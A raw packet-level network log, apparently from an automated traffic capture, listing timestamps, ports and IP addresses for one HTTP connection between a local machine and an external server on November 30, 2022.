Nov 30, 2022 00:22:31.876391888 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876410007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876410961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876430035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876435995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876449108 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876466990 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876473904 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876486063 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876504898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876517057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876524925 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876535892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876543999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876573086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876574993 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876593113 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876605988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876615047 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876635075 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876647949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876655102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876674891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876682043 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876697063 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876703978 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876718998 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876739025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876744032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876759052 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876777887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876785994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876797915 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876808882 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876817942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876837969 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876857042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876859903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876877069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876898050 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876902103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876919031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876919985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876940012 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876951933 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876960039 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876970053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.876981020 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.876986980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877001047 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877003908 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877019882 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877021074 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877041101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877059937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877075911 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877079010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877099991 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877119064 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877119064 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877145052 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877151966 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877166033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877172947 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877187014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877206087 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877207041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877227068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877234936 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877247095 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877265930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877273083 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877285957 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877295017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877309084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877324104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877327919 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877348900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877352953 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877368927 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877377033 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877388000 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877396107 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877408028 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877414942 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877428055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877434969 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877448082 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877451897 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877465963 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877470016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877490997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877501011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877511978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877517939 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877532005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877537012 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877552032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877552032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877572060 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877573967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877593994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877597094 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877614975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877615929 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877630949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877634048 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877651930 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877654076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877671957 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877674103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877691984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877693892 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877716064 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877721071 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877736092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877742052 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877754927 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877759933 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877774954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877779961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877794027 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877795935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877815962 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877815962 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877835989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877855062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877859116 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877873898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877885103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877893925 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877912998 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877912998 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877923965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877934933 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877943993 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877955914 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877973080 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.877974033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.877995014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878012896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878015041 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878032923 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878040075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878052950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878058910 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878073931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878084898 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878093958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878108025 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878114939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878130913 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878134012 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878153086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878170013 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878170967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878190994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878199100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878211021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878221989 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878230095 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878238916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878248930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878257036 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878269911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878274918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878288984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878293991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878305912 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878309011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878329039 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878330946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878346920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878350973 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878366947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878377914 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878386021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878405094 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878413916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878413916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878424883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878428936 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878443956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878446102 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878463030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878468990 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878483057 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878488064 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878503084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878504992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878521919 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878525019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878540993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878551006 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878560066 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878566980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878582001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878583908 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878601074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878609896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878621101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878638983 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878657103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878675938 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878675938 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878684998 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878695965 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878715992 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878720045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878736019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878740072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878756046 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878765106 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878774881 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878782034 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878793955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878799915 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878813982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878820896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878833055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878835917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878853083 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.878853083 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878870010 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.878895998 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.900903940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.903965950 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.904484987 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.904561996 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.905108929 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906152010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906176090 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906198978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906217098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906234026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906235933 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906255007 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906255960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906275988 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906294107 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906308889 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906312943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906325102 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906332016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906351089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906357050 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906373024 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906382084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906393051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906411886 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906413078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906435013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906440020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906455040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906466007 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906476021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906485081 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906497002 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906507969 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906526089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906529903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906546116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906550884 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906563997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906567097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906586885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906589031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906605959 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906608105 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906625986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906642914 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906716108 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906833887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906856060 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906907082 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906929970 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906949997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906960964 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.906971931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906994104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.906995058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907011032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907015085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907037973 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907083035 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907145023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907181025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907203913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907224894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907234907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907248020 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907259941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907269955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907290936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907291889 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907314062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907320023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907335997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907344103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907357931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907365084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907378912 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907381058 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907403946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.907423019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907439947 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.907449961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908164978 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908567905 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908590078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908612013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908627987 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908653021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908653975 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908690929 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908700943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908716917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908735991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908736944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908757925 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908760071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908775091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908780098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908799887 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908811092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908830881 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908832073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908854008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.908869028 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908885002 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.908905983 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909043074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909065008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909085035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909106016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909125090 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909146070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909166098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909185886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909204960 CET	80	49710	88.198.94.71	192.168.2.5
